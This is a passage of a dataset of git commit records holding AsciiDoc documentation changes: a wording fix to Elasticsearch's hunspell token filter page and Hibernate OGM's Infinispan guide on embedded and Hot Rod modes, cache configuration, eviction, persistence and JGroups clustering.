search,fred84\/elasticsearch,scorpionvicky\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,Shepard1212\/elasticsearch,bawse\/elasticsearch,njlawton\/elasticsearch,jprante\/elasticsearch,gfyoung\/elasticsearch,JervyShi\/elasticsearch,geidies\/elasticsearch,LeoYao\/e
lasticsearch,spiegela\/elasticsearch,nilabhsagar\/elasticsearch,jimczi\/elasticsearch,Stacey-Gammon\/elasticsearch,wuranbo\/elasticsearch,umeshdangat\/elasticsearch,umeshdangat\/elasticsearch,masaruh\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra,fred84\/elasticsearch,C-Bish\/elasticsearch,JackyMai\/elasticsearch,lks21c\/elasticsearch,pozhidaevak\/elasticsearch,LeoYao\/elasticsearch,Helen-Zhao\/elasticsearch,awislowski\/elasticsearch,kalimatas\/elasticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,girirajsharma\/elasticsearch,wangtuo\/elasticsearch,nilabhsagar\/elasticsearch,girirajsharma\/elasticsearch,mohit\/elasticsearch,nazarewk\/elasticsearch,nilabhsagar\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,wangtuo\/elasticsearch,glefloch\/elasticsearch,MaineC\/elasticsearch,fforbeck\/elasticsearch,masaruh\/elasticsearch,fforbeck\/elasticsearch,liweinan0423\/elasticsearch,markwalkom\/elasticsearch,naveenhooda2000\/elasticsearch,qwerty4030\/elasticsearch,ricardocerq\/elasticsearch,obourgain\/elasticsearch,mohit\/elasticsearch,yanjunh\/elasticsearch,gmarz\/elasticsearch,henakamaMSFT\/elasticsearch,ricardocerq\/elasticsearch,ZTE-PaaS\/elasticsearch,nezirus\/elasticsearch,IanvsPoplicola\/elasticsearch,mjason3\/elasticsearch,artnowo\/elasticsearch,strapdata\/elassandra5-rc,StefanGor\/elasticsearch,artnowo\/elasticsearch,pozhidaevak\/elasticsearch,JervyShi\/elasticsearch,masaruh\/elasticsearch,Shepard1212\/elasticsearch,jprante\/elasticsearch,gmarz\/elasticsearch,JackyMai\/elasticsearch,robin13\/elasticsearch,sreeramjayan\/elasticsearch,mortonsykes\/elasticsearch,qwerty4030\/elasticsearch,strapdata\/elassandra5-rc,s1monw\/elasticsearch,dpursehouse\/elasticsearch,robin13\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,ZTE-PaaS\/elasticsearch,scottsom\/elasticsearch,sneivandt\/elasticsearch,sreeramjayan\/elasticsearch,elasticdog\/elasticsearch,spiegela\/elasticsearch,zkidkid\/elasticsearch,dongjoon-hyun\/elasticsearch,MisterAndersen\/elasticsearch,winstonewert\/elasticsearch,markwalkom\/elasticsearch,ZTE-PaaS\/elasticsearch,obourgain\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nazarewk\/elasticsearch,zkidkid\/elasticsearch,yanjunh\/elasticsearch,JackyMai\/elasticsearch,strapdata\/elassandra5-rc,vroyer\/elasticassandra,dongjoon-hyun\/elasticsearch,njlawton\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,glefloch\/elasticsearch,uschindler\/elasticsearch,StefanGor\/elasticsearch,mortonsykes\/elasticsearch,strapdata\/elassandra5-rc,Shepard1212\/elasticsearch,i-am-Nathan\/elasticsearch,jimczi\/elasticsearch,elasticdog\/elasticsearch,HonzaKral\/elasticsearch,awislowski\/elasticsearch,dongjoon-hyun\/elasticsearch,StefanGor\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,dongjoon-hyun\/elasticsearch,nezirus\/elasticsearch,lks21c\/elasticsearch,scottsom\/elasticsearch,dongjoon-hyun\/elasticsearch,C-Bish\/elasticsearch,nezirus\/elasticsearch,njlawton\/elasticsearch,JSCooke\/elasticsearch,scorpionvicky\/elasticsearch,geidies\/elasticsearch,shreejay\/elasticsearch,jprante\/elasticsearch,fernandozhu\/elasticsearch,MisterAndersen\/elasticsearch,yanjunh\/elasticsearch,JSCooke\/elasticsearch,GlenRSmith\/elasticsearch,geidies\/elasticsearch,LewayneNaidoo\/elasticsearch,rajanm\/elasticsearch","old_file":"docs\/reference\/analysis\/tokenfilters\/hunspell-tokenfilter.asciidoc","new_file":"docs\/reference\/analysis\/tokenfilters\/hunspell-tokenfilter.asciidoc","new_contents":"[[analysis-hunspell-token
filter]]\n=== Hunspell Token Filter\n\nBasic support for hunspell stemming. Hunspell dictionaries will be\npicked up from a dedicated hunspell directory on the filesystem\n(`<path.conf>\/hunspell`). Each dictionary is expected to\nhave its own directory named after its associated locale (language).\nThis dictionary directory is expected to hold a single `*.aff` and\none or more `*.dic` files (all of which will automatically be picked up).\nFor example, assuming the default hunspell location is used, the\nfollowing directory layout will define the `en_US` dictionary:\n\n[source,js]\n--------------------------------------------------\n- conf\n |-- hunspell\n | |-- en_US\n | | |-- en_US.dic\n | | |-- en_US.aff\n--------------------------------------------------\n\nEach dictionary can be configured with one setting:\n\n`ignore_case`::\n If true, dictionary matching will be case insensitive\n (defaults to `false`)\n\nThis setting can be configured globally in `elasticsearch.yml` using\n\n* `indices.analysis.hunspell.dictionary.ignore_case`\n\nor for specific dictionaries:\n\n* `indices.analysis.hunspell.dictionary.en_US.ignore_case`.\n\nIt is also possible to add a `settings.yml` file under the dictionary\ndirectory which holds these settings (this will override any other\nsettings defined in the `elasticsearch.yml`).\n\nOne can use the hunspell stem filter by configuring it in the analysis\nsettings:\n\n[source,js]\n--------------------------------------------------\n{\n \"analysis\" : {\n \"analyzer\" : {\n \"en\" : {\n \"tokenizer\" : \"standard\",\n \"filter\" : [ \"lowercase\", \"en_US\" ]\n }\n },\n \"filter\" : {\n \"en_US\" : {\n \"type\" : \"hunspell\",\n \"locale\" : \"en_US\",\n \"dedup\" : true\n }\n }\n }\n}\n--------------------------------------------------\n\nThe hunspell token filter accepts four options:\n\n`locale`::\n A locale for this filter. If this is unset, the `lang` or\n `language` are used instead - so one of these has to be set.\n\n`dictionary`::\n The name of a dictionary. The path to your hunspell\n dictionaries should be configured via\n `indices.analysis.hunspell.dictionary.location` before.\n\n`dedup`::\n If only unique terms should be returned, this needs to be\n set to `true`. Defaults to `true`.\n\n`longest_only`::\n If only the longest term should be returned, set this to `true`.\n Defaults to `false`: all possible stems are returned.\n\nNOTE: As opposed to the snowball stemmers (which are algorithm based)\nthis is a dictionary lookup based stemmer and therefore the quality of\nthe stemming is determined by the quality of the dictionary.\n\n[float]\n==== Dictionary loading\n\nBy default, the default Hunspell directory (`config\/hunspell\/`) is checked\nfor dictionaries when the node starts up, and any dictionaries are\nautomatically loaded.\n\nDictionary loading can be deferred until the dictionaries are actually used by setting\n`indices.analysis.hunspell.dictionary.lazy` to `true` in the config file.\n\n[float]\n==== References\n\nHunspell is a spell checker and morphological analyzer designed for\nlanguages with rich morphology and complex word compounding and\ncharacter encoding.\n\n1. Wikipedia, http:\/\/en.wikipedia.org\/wiki\/Hunspell\n\n2. Source code, http:\/\/hunspell.sourceforge.net\/\n\n3. Open Office Hunspell dictionaries, http:\/\/wiki.openoffice.org\/wiki\/Dictionaries\n\n4. Mozilla Hunspell dictionaries, https:\/\/addons.mozilla.org\/en-US\/firefox\/language-tools\/\n\n5. 
Chromium Hunspell dictionaries,\n http:\/\/src.chromium.org\/viewvc\/chrome\/trunk\/deps\/third_party\/hunspell_dictionaries\/\n","old_contents":"[[analysis-hunspell-tokenfilter]]\n=== Hunspell Token Filter\n\nBasic support for hunspell stemming. Hunspell dictionaries will be\npicked up from a dedicated hunspell directory on the filesystem\n(`<path.conf>\/hunspell`). Each dictionary is expected to\nhave its own directory named after its associated locale (language).\nThis dictionary directory is expected to hold a single `*.aff` and\none or more `*.dic` files (all of which will automatically be picked up).\nFor example, assuming the default hunspell location is used, the\nfollowing directory layout will define the `en_US` dictionary:\n\n[source,js]\n--------------------------------------------------\n- conf\n |-- hunspell\n | |-- en_US\n | | |-- en_US.dic\n | | |-- en_US.aff\n--------------------------------------------------\n\nEach dictionary can be configured with one setting:\n\n`ignore_case`::\n If true, dictionary matching will be case insensitive\n (defaults to `false`)\n\nThis setting can be configured globally in `elasticsearch.yml` using\n\n* `indices.analysis.hunspell.dictionary.ignore_case`\n\nor for specific dictionaries:\n\n* `indices.analysis.hunspell.dictionary.en_US.ignore_case`.\n\nIt is also possible to add `settings.yml` file under the dictionary\ndirectory which holds these settings (this will override any other\nsettings defined in the `elasticsearch.yml`).\n\nOne can use the hunspell stem filter by configuring it the analysis\nsettings:\n\n[source,js]\n--------------------------------------------------\n{\n \"analysis\" : {\n \"analyzer\" : {\n \"en\" : {\n \"tokenizer\" : \"standard\",\n \"filter\" : [ \"lowercase\", \"en_US\" ]\n }\n },\n \"filter\" : {\n \"en_US\" : {\n \"type\" : \"hunspell\",\n \"locale\" : \"en_US\",\n \"dedup\" : true\n }\n }\n }\n}\n--------------------------------------------------\n\nThe hunspell token filter accepts four options:\n\n`locale`::\n A locale for this filter. If this is unset, the `lang` or\n `language` are used instead - so one of these has to be set.\n\n`dictionary`::\n The name of a dictionary. The path to your hunspell\n dictionaries should be configured via\n `indices.analysis.hunspell.dictionary.location` before.\n\n`dedup`::\n If only unique terms should be returned, this needs to be\n set to `true`. Defaults to `true`.\n\n`longest_only`::\n If only the longest term should be returned, set this to `true`.\n Defaults to `false`: all possible stems are returned.\n\nNOTE: As opposed to the snowball stemmers (which are algorithm based)\nthis is a dictionary lookup based stemmer and therefore the quality of\nthe stemming is determined by the quality of the dictionary.\n\n[float]\n==== Dictionary loading\n\nBy default, the default Hunspell directory (`config\/hunspell\/`) is checked \nfor dictionaries when the node starts up, and any dictionaries are \nautomatically loaded.\n\nDictionary loading can be deferred until they are actually used by setting\n`indices.analysis.hunspell.dictionary.lazy` to `true`in the config file.\n\n[float]\n==== References\n\nHunspell is a spell checker and morphological analyzer designed for\nlanguages with rich morphology and complex word compounding and\ncharacter encoding.\n\n1. Wikipedia, http:\/\/en.wikipedia.org\/wiki\/Hunspell\n\n2. Source code, http:\/\/hunspell.sourceforge.net\/\n\n3. Open Office Hunspell dictionaries, http:\/\/wiki.openoffice.org\/wiki\/Dictionaries\n\n4. 
Mozilla Hunspell dictionaries, https:\/\/addons.mozilla.org\/en-US\/firefox\/language-tools\/\n\n5. Chromium Hunspell dictionaries,\n http:\/\/src.chromium.org\/viewvc\/chrome\/trunk\/deps\/third_party\/hunspell_dictionaries\/\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0f16e5702e7bba3492d608a8683beba105428273","subject":"OGM-1206 Highlight the referential integrity problem better in the Hot Rod documentation","message":"OGM-1206 Highlight the referential integrity problem better in the Hot Rod documentation\n","repos":"Sanne\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm,hibernate\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/modules\/infinispan.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/modules\/infinispan.asciidoc","new_contents":"[[ogm-infinispan]]\n\n\/\/ vim: set colorcolumn=100:\n\n== Infinispan\n\nInfinispan is an open source in-memory data grid focusing on high performance.\nAs a data grid, you can deploy it on multiple servers - referred to as nodes -\nand connect to it as if it were a single storage engine:\nit will cleverly distribute both the computation effort and the data storage.\n\nIt is trivial to setup on a single node and Hibernate OGM knows how to boot one,\nso you can easily try it out.\nBut Infinispan really shines in multiple node deployments:\nyou will need to configure some networking details\nbut nothing changes in terms of application behaviour,\nwhile performance and data size can scale linearly.\n\nFrom all its features we will only describe those relevant to Hibernate OGM;\nfor a complete description of all its capabilities and configuration options,\nrefer to the Infinispan project documentation at\nhttp:\/\/infinispan.org\/documentation\/[infinispan.org].\n\n=== Why use Hibernate OGM with Infinispan?\n\nInfinispan provides great scalability and elasticity features but\nit can have a steep learning curve.\n\nIf you are already familiar with the JPA API you will\nbe able to store your data in Infinispan quickly and you will also benefit\nfrom the optimizations that a framework like Hibernate OGM can\napply under the hood.\n\nIn particular:\n\n* you can get started without having to learn `Protobuf` first\n* no need to learn the Infinispan API\n* Hibernate OGM will setup and manage the `Hot Rod client` for you\n* same API as Hibernate ORM, meaning that you can use the same tools\n\nYou will still need to learn about Infinispan, all its capabilities and how to configure\nthem to reach your application top performance, but you can get a proof of concept\ndone quickly with the example configuration.\n\n=== Infinispan: Choosing between Embedded Mode and Hot Rod\n\nJava applications can use Infinispan in two fundamentally different ways:\n\n* Run Infinispan in _Embedded Mode_.\n* Connect to an _Infinispan Server_ using an _Hot Rod client_.\n\nHibernate OGM supports connecting in either mode, but since the APIs and capabilities\nare different in the two modes, it provides two different modules\neach having its own set of configuration options and features.\n\nRunning Infinispan in _Embedded Mode_ implies that the Infinispan node is running\nin the same JVM as the code using it.\nThe benefit is that some data (or all data) will be stored on the same JVM, making reads\nof this data 
extremely fast and efficient as there won't be RPCs to other systems.\nWrite operations will still need to issue some coordination RPCs but they also\nbenefit from a reduction of necessary operations.\n\nHowever, the very fact that some data is stored in the same JVM is also the drawback\nof this choice: this typically implies having to configure your JVM for larger\nheap sizes, which are harder to tune for optimal performance. Other system\nparameters might also need to be configured as this JVM node is now to be treated\nas a \"data holding node\" rather than a stateless app node.\nSome architects and system administrators will not like that.\n\nWhen connecting to an _Infinispan Server_ over the _Hot Rod client_, the architecture\nis similar to having Hibernate connect to a traditional database: the data is stored\non the _Infinispan Server_ nodes, and Hibernate OGM uses a client with a pool of\nTCP connections to talk to the server.\nBut the Hot Rod client is not transactional; see the limitation described here:\n(<<storage-principles-of-infinispan-dataprovider>>).\n\nAnother important difference is that when connecting to _Infinispan Server_ via\n_Hot Rod_ the data is encoded using _Google Protobuf_, which requires a schema.\nThis schema is auto-generated by Hibernate OGM.\n\nHaving a _Protobuf Schema_ makes it possible to evolve the schema in non-destructive\nways, and makes it possible for other clients to access the data - even clients written\nin other programming languages.\n\n[NOTE]\n====\nMost introductory tutorials of Hibernate OGM focus on Infinispan in _Embedded Mode_\nbecause in this mode OGM can start its own embedded Infinispan node, using\na simple, local only Infinispan configuration.\n\nWhen using _Infinispan Server_ instead, you'll need to http:\/\/infinispan.org\/download\/[download\nthe server distribution], unpack and start it, then set the Hibernate OGM configuration\nproperties so that the integrated Hot Rod client knows how to connect to it.\n====\n\n[TIP]\n====\n[.lead]\nAdvanced performance options & interaction with Hibernate 2nd level caching\n\nWhen using Infinispan in Embedded Mode, and its caches are configured in `REPLICATION` Mode,\nall nodes will contain a full replica of the database: write performance won't scale but\nyour reads will be very fast and scale up linearly with the size of the cluster,\nmaking usage of Hibernate's 2nd level cache redundant.\n\nWhen configuring Infinispan in `DISTRIBUTED` cache mode, each of your nodes will have a\nlocal copy of a slice of your data; remember you can tune how large the section\nshould be with various Infinispan configuration options (such as _numOwners_), and you\ncould combine this with Hibernate's 2nd level caching and\/or enable Infinispan's\n1st level caching.\n\nYou can even combine Infinispan with having it passivate to other storage systems\nsuch as an RDBMS or another NoSQL engine; such storage can be configured to be asynchronous.\nThis option is available to both Infinispan Embedded and Infinispan Server; it's even possible\nto use a light layer of Infinispan Embedded - containing a small data set - and have it\nbacked by an Infinispan Server cluster to expand its storage capabilities without\nhaving to enlarge heap size too much on the embedded, application nodes.\n\nFinally, remember that options such as replication vs distribution (`CacheMode`) and passivation\nto additional storage (``CacheStore``s) can be configured differently for each Infinispan cache.\n====\n\n[[ogm-infinispan-embedded]]\n=== Hibernate OGM & Infinispan Embedded\n\nLet's see how to configure and use Hibernate OGM with Infinispan in Embedded Mode.\n\nFor usage of Infinispan Server over Hot Rod, skip to <<ogm-infinispan-remote>>.\n\n[[ogm-infinispan-configuration]]\n\n==== Configure Hibernate OGM for Infinispan Embedded\n\nBasically, you configure Hibernate OGM and Infinispan in two steps:\n\n* Add the dependencies to your classpath\n* And then choose one of:\n\n** Use the default Infinispan configuration (no action needed)\n** Point to your own configuration resource file\n** Point to a [acronym]`JNDI` name of an existing instance of an Infinispan `CacheManager`\n\n* If you need to run JPQL or HQL queries, add Hibernate Search on the classpath\n (<<ogm-query-using-hibernate-search>>)\n\nNote that, except when using [acronym]`JNDI`, Hibernate OGM will bootstrap an Infinispan Embedded node\nin your same JVM, and terminate it on shutdown of the Hibernate instance.\n\n[CAUTION]\n====\nIf you have Hibernate OGM boot Infinispan using a clustered configuration, this might automatically join the cluster of\nother Infinispan nodes running in your network: the default is automatic discovery!\n====\n\n[[ogm-infinispan-adddepencies]]\n\n==== Adding Infinispan dependencies\n\nTo add the dependencies for the Hibernate OGM extensions for Infinispan Embedded via Maven, add the following module:\n\n\n[source, XML]\n[subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.hibernate.ogm<\/groupId>\n <artifactId>hibernate-ogm-infinispan-embedded<\/artifactId>\n <version>{hibernate-ogm-version}<\/version>\n<\/dependency>\n----\n\nIf you're not using a dependency management tool,\ncopy all the dependencies from the distribution in the directories:\n\n* `\/lib\/required`\n* `\/lib\/infinispan`\n* Optionally - depending on your container - you might need some of the jars from `\/lib\/provided`\n\n\n[[ogm-infinispan-configuration-properties]]\n\n==== Infinispan specific configuration properties\n\nThe advanced configuration details of an Infinispan Cache\nare defined in an Infinispan specific XML configuration file;\nthe Hibernate OGM properties are simple\nand usually just point to this external resource.\n\nTo use the default configuration provided by Hibernate OGM -\nwhich is a good starting point for new users - you don't have to set any property.\n\n.Hibernate OGM properties for Infinispan\n`hibernate.ogm.datastore.provider`::\nSet it to `infinispan_embedded` to use Infinispan as the datastore provider in embedded mode.\n`hibernate.ogm.infinispan.cachemanager_jndi_name`::\nIf you have an Infinispan `EmbeddedCacheManager` registered in JNDI,\nprovide the JNDI name and Hibernate OGM will use this instance\ninstead of starting a new `CacheManager`.\nThis will ignore any further configuration properties\nas Infinispan is assumed to be already configured.\nInfinispan can typically be pushed to JNDI via WildFly, Spring or Seam.\n`hibernate.ogm.infinispan.configuration_resource_name`::\nShould point to the resource name of an Infinispan configuration file.\nThis is ignored in case [acronym]`JNDI` lookup is set.\nDefaults to `org\/hibernate\/ogm\/datastore\/infinispan\/default-config.xml`.\n`hibernate.ogm.datastore.keyvalue.cache_storage`::\nThe strategy for persisting data in Infinispan.\nThe following two strategies exist (values of the `org.hibernate.ogm.datastore.keyvalue.options.CacheMappingType` enum):\n\n* `CACHE_PER_TABLE`: A dedicated cache will be used for each entity 
type, association type and id source table.\n* `CACHE_PER_KIND`: Three caches will be used: one cache for all entities, one cache for all associations and one cache for all id sources.\n\n+\nDefaults to `CACHE_PER_TABLE`. It is the recommended strategy as it makes it easier to target a specific cache for a given entity.\n`hibernate.ogm.datastore.create_database`::\nIf set to `true` Hibernate OGM will create any missing Cache definitions on the Infinispan Server.\nThis requires the Infinispan Server configuration to have a default configuration defined, as this will be copied to the newly defined caches.\nIf set to `false` an exception is thrown when a Cache is expected but not explicitly configured on the server.\nDefaults to `false`.\n\n[NOTE]\n====\nWhen bootstrapping a session factory or entity manager factory programmatically,\nyou should use the constants accessible via `org.hibernate.ogm.datastore.infinispan.InfinispanProperties`\nwhen specifying the configuration properties listed above.\n\nCommon properties shared between stores are declared on `OgmProperties`\n(a super interface of `InfinispanProperties`).\n\nFor maximum portability between stores, use the most generic interface possible.\n====\n\n==== Cache names used by Hibernate OGM\n\nDepending on the cache mapping approach, Hibernate OGM will either:\n\n* store each entity type, association type and id source table in a dedicated cache\n very much like what Hibernate ORM would do. This is the `CACHE_PER_TABLE` approach.\n* store data in three different caches when using the `CACHE_PER_KIND` approach:\n** `ENTITIES`: is going to be used to store the main attributes of all your entities.\n** `ASSOCIATIONS`: stores the association information representing the links between entities.\n** `IDENTIFIER_STORE`: contains internal metadata that Hibernate OGM needs\n to provide sequences and auto-incremental numbers for primary key generation.\n\nThe preferred strategy is `CACHE_PER_TABLE` as it offers both more fine grained configuration options\nand the ability to work on specific entities in a more simple fashion.\n\nIn the following paragraphs, we will explain which aspects of Infinispan\nyou're likely to want to reconfigure from their defaults.\nAll attributes and elements from Infinispan which we don't mention are safe to ignore.\nRefer to the http:\/\/infinispan.org\/documentation\/[Infinispan User Guide]\nfor the guru level performance tuning and customizations.\n\nAn Infinispan configuration file is an XML file complying with the Infinispan schema;\nthe basic structure is shown in the following example:\n\n.Simple example of an Infinispan configuration file\n====\n[source, XML]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<infinispan\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"urn:infinispan:config:9.1 http:\/\/www.infinispan.org\/schemas\/infinispan-config-9.1.xsd\"\n xmlns=\"urn:infinispan:config:9.1\">\n\n <cache-container name=\"HibernateOGM\" default-cache=\"DEFAULT\">\n\n <!-- Default cache settings -->\n <local-cache name=\"DEFAULT\">\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <\/local-cache>\n\n <local-cache name=\"User\"\/>\n\n <local-cache name=\"Order\"\/>\n\n <local-cache name=\"associations_User_Order\"\/>\n\n <\/cache-container>\n<\/infinispan>\n----\n====\n\nThere are global settings that can be set before the `cache_container` section.\nThese settings will affect the whole instance;\nmainly of interest for Hibernate OGM users is the `jgroups` element\nin which we 
will set JGroups configuration overrides.\n\nInside the `cache-container` section are defined explicit named caches and their configurations\nas well as the default cache (named `DEFAULT` here) if we want to affect all named caches.\nThis is where we will likely want to configure clustering modes, eviction policies and ``CacheStore``s.\n\n[[ogm-infinispan-storage]]\n\n==== Manage data size\n\nIn its default configuration Infinispan stores all data in the heap of the JVM;\nin this barebone mode it is conceptually not very different than using a HashMap:\nthe size of the data should fit in the heap of your VM,\nand stopping\/killing\/crashing your application will get all data lost\nwith no way to recover it.\n\nTo store data permanently (out of the JVM memory) a `CacheStore` should be enabled.\nThe Infinispan project provides many `CacheStore` implementations;\na simple one is the http:\/\/infinispan.org\/docs\/stable\/user_guide\/user_guide.html#single_file_store[\"Single File Store\"]\nwhich is able to store data in simple binary files, on any read\/write mounted filesystem;\nYou can find many more implementations to store your data in anything\nfrom JDBC connected relational databases, other NoSQL engines such as MongoDB and Cassandra,\nor even delegate to other Infinispan clusters.\nFinally, implementing a custom `CacheStore` is quite easy.\n\nTo limit the memory consumption of the precious heap space,\nyou can activate a `passivation` or an `eviction` policy;\nagain there are several strategies to play with,\nfor now let's just consider you'll likely need one to avoid running out of memory\nwhen storing too many entries in the bounded JVM memory space;\nof course you don't need to choose one while experimenting with limited data sizes:\nenabling such a strategy doesn't have any other impact\nin the functionality of your Hibernate OGM application\n(other than performance: entries stored in the Infinispan in-memory space\nis accessed much quicker than from any CacheStore).\n\nA `CacheStore` can be configured as write-through,\ncommitting all changes to the `CacheStore` before returning (and in the same transaction)\nor as write-behind.\nA write-behind configuration is normally not encouraged in storage engines,\nas a failure of the node implies some data might be lost\nwithout receiving any notification about it,\nbut this problem is mitigated in Infinispan because of its capability\nto combine CacheStore write-behind\nwith a synchronous replication to other Infinispan nodes.\n\n.Enabling a FileCacheStore and eviction\n====\n\n\n[source, XML]\n----\n<local-cache name=\"User\">\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <eviction strategy=\"LIRS\" max-entries=\"2000\"\/>\n <persistence passivation=\"true\">\n <file-store\n shared=\"false\"\n path=\"\/var\/infinispan\/myapp\/users\">\n <write-behind flush-lock-timeout=\"15000\" thread-pool-size=\"5\" \/>\n <\/file-store>\n <\/persistence>\n<\/local-cache>\n----\n\n====\n\nIn this example we enabled both `eviction` and a `CacheStore` (the `persistence` element).\n`LIRS` is one of the choices we have for eviction strategies.\nHere it is configured to keep (approximately) 2000 entries in live memory\nand evict the remaining as a memory usage control strategy.\n\nThe `CacheStore` is enabling `passivation`,\nwhich means that the entries which are evicted are stored on the filesystem.\n\n[WARNING]\n====\nYou could configure an eviction strategy while not configuring a passivating CacheStore!\nThat is a valid configuration for Infinispan but 
\n\n[[ogm-infinispan-clustering]]\n\n==== Clustering: store data on multiple Infinispan nodes\n\nThe best thing about Infinispan is that all nodes are treated equally\nand it requires almost no upfront capacity planning:\nto add more nodes to the cluster you just have to start new JVMs,\non the same or different physical servers,\nwith the same Infinispan configuration and the same application.\n\nInfinispan supports several clustering _cache modes_;\neach mode provides the same API and functionality\nbut with different performance, scalability and availability options:\n\n.Infinispan cache modes\nlocal::\nUseful for a single VM: the networking stack is disabled.\nreplication::\nAll data is replicated to each node;\neach node contains a full copy of all entries.\nConsequently reads are faster but writes don't scale as well.\nNot suited for very large datasets.\ndistribution::\nEach entry is distributed on multiple nodes for redundancy and failure recovery,\nbut not to all the nodes.\nProvides linear scalability for both write and read operations.\n`distribution` is the default mode.\n\nTo use the `replication` or `distribution` cache modes\nInfinispan will use JGroups to discover and connect to the other nodes.\n\nIn the default configuration,\nJGroups will attempt to autodetect peer nodes using a multicast socket;\nthis works out of the box in most network environments\nbut will require some extra configuration in cloud environments\n(which often block multicast packets) or in case of strict firewalls.\nSee the http:\/\/www.jgroups.org\/manual\/html_single\/[JGroups reference documentation];\nspecifically, look for _Discovery Protocols_ to customize the detection of peer nodes.\n\nNowadays, the [acronym]`JVM` defaults to using the [acronym]`IPv6` network stack;\nthis will work fine with JGroups, but only if you configured [acronym]`IPv6` correctly.\nIt is often useful to force the [acronym]`JVM` to use [acronym]`IPv4`.\n\nIt is also important to let JGroups know which networking interface you want to use;\nit will bind to one interface by default, but if you have multiple network interfaces\nthat might not be the one you expect.\n\n.JVM properties to set for clustering\n====\n[source]\n----\n#192.168.122.1 is an example IPv4 address\n-Djava.net.preferIPv4Stack=true -Djgroups.bind_addr=192.168.122.1\n----\n====\n\n[NOTE]\n====\nYou don't need to use [acronym]`IPv4`: JGroups is compatible with [acronym]`IPv6`\nprovided you have routing properly configured and valid addresses assigned.\n\nThe `jgroups.bind_addr` needs to match a placeholder name\nin your JGroups configuration in case you don't use the default one.\n====\n\nThe default configuration uses `distribution` as cache mode\nand uses the `jgroups-tcp.xml` configuration for JGroups,\nwhich is contained in the Infinispan jar\nas the default configuration for Infinispan users.\nLet's see how to reconfigure this:\n\n.Reconfiguring the cache mode and overriding the JGroups configuration\n====\n[source, XML]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<infinispan\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"urn:infinispan:config:9.1 http:\/\/www.infinispan.org\/schemas\/infinispan-config-9.1.xsd\"\n xmlns=\"urn:infinispan:config:9.1\">\n\n <jgroups>\n <stack-file name=\"custom-stack\" path=\"my-jgroups-conf.xml\" \/>\n <\/jgroups>\n\n <cache-container name=\"HibernateOGM\" 
default-cache=\"DEFAULT\">\n <transport stack=\"custom-stack\" \/>\n\n <!-- *************************************** -->\n <!-- Default cache used as template -->\n <!-- *************************************** -->\n <distributed-cache name=\"DEFAULT\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/distributed-cache>\n\n <!-- Override the cache mode: -->\n <replicated-cache name=\"User\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/replicated-cache>\n\n <distributed-cache name=\"Order\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/distributed-cache>\n\n <distributed-cache name=\"associations_User_Order\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/distributed-cache>\n\n <\/cache-container>\n\n<\/infinispan>\n----\n====\n\nIn the example above we specify a custom JGroups configuration file\nand set the cache mode for the default cache to `distribution`;\nthis is going to be inherited by the `Order` and the `associations_User_Order` caches.\nBut for `User` we have chosen (for the sake of this example) to use `replication`.\n\nNow that you have clustering configured, start the service on multiple nodes.\nEach node will need the same configuration and jars.\n\n[TIP]\n====\nWe have just shown how to override the clustering mode\nand the networking stack for the sake of completeness, but you don't have to!\n\nStart with the default configuration and see if that fits you.\nYou can fine tune these setting when you are closer to going in production.\n====\n\n[[ogm-infinispan-storage-principles]]\n==== Storage principles\n\nTo describe things simply, each entity is stored under a single key.\nThe value itself is a map containing the columns \/ values pair.\n\nEach association from one entity instance to (a set of) another is stored under a single key.\nThe value contains the navigational information to the (set of) entity.\n\n[[ogm-infinispan-built-in-types]]\n===== Properties and built-in types\n\nEach entity is represented by a map.\nEach property or more precisely column is represented by an entry in this map,\nthe key being the column name.\n\nHibernate OGM support by default the following property types:\n\n* `java.lang.String`\n* `java.lang.Character` (or char primitive)\n* `java.lang.Boolean` (or boolean primitive); Optionally the annotations `@Type(type = \"true_false\")`, `@Type(type = \"yes_no\")` and `@Type(type = \"numeric_boolean\")` can be used to map boolean properties to the characters 'T'\/'F', 'Y'\/'N' or the int values 0\/1, respectively.\n* `java.lang.Byte` (or byte primitive)\n* `java.lang.Short` (or short primitive)\n* `java.lang.Integer` (or integer 